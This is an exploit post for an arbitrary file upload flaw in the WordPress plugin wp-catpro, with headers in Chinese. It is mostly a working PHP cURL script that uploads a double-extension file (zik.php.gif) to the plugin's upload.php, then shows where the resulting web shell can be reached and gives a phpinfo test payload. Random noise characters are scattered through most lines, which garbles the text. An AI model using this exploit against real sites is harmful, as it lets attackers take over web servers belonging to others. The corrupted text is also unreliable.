Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
8 N0 Y( i# ~2 B#-----------------------------------------------------------------------
% ^0 e$ d9 N, J9 k9 p( Q
/ R, Y( y' p& T) Q5 J作者 => Zikou-163 n3 J% D6 m; s* d0 C
邮箱 => zikou16x@gmail.com
, k1 U1 T8 N; d测试系统 : Windows 7 , Backtrack 5r3( ?: G# d% O1 g$ K4 R8 F
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip. i" P( o1 R2 m$ N; q
####
/ j. i# d9 E2 p3 C8 z& D
7 U$ h/ U' a5 F/ C7 D; e6 [( E6 |#=> Exploit 信息:3 t0 `% q' v+ D1 l/ I- y4 F5 A
------------------
+ W2 [2 H. o/ Q9 s# 攻击者可以上传 file/shell.php.gif+ R6 z" s! r3 ?& Z$ X, c# n' g; _+ p
# ("jpg", "gif", "png") // Allowed file extensions
- P- m3 H7 [8 n1 {- W# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)' B9 G+ T) a* Q6 K; \3 `
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)5 C. D1 N* ]/ C# D f- @
------------------
2 \4 W n6 v5 X7 |7 i& h% d + k$ C( E/ F! @
#=> Exploit+ o. p3 f; ^" \& R
-----------
5 s. o& s0 ?8 u) k& F9 {<?php
+ ]$ g a: C- g5 I- p* ]1 S6 W
5 I- [; q$ v! e% j4 H& f$uploadfile="zik.php.gif";8 _2 i7 Q6 |- u I9 ?0 F
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
: k5 N. ^! f) ~4 Fcurl_setopt($ch, CURLOPT_POST, true);
, D) D' K7 `$ `/ K Ecurl_setopt($ch, CURLOPT_POSTFIELDS,
$ A; h+ |- H. y$ d! |" M# sarray('Filedata'=>"@$uploadfile",( z% D5 {% q K7 ^0 C: I6 n' o2 X
'folder'=>'/wp-content/uploads/catpro/'));* L2 T0 Z, L$ `! ^
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1 L, z) ^% S% Q; W. @& O- n$ R/ Y$postResult = curl_exec($ch); F1 }1 q2 l% A7 i& K5 I
curl_close($ch);
/ x: s" q: T1 }* O K* d, d) v f ( u) T7 M: C& g4 ^
print "$postResult";8 W @7 M8 T, p4 O) u
, O8 I5 d$ T7 F5 [; \8 r- zShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
% ?' T# y5 |3 x4 s4 p# q5 O5 n ?>
# ^# [$ ?; E3 p3 R7 U$ }<?php% a2 W+ ?7 _7 S- H- k8 h
phpinfo();
5 H# |" l! D( g- V( Y1 T4 x2 Y1 U7 w?> |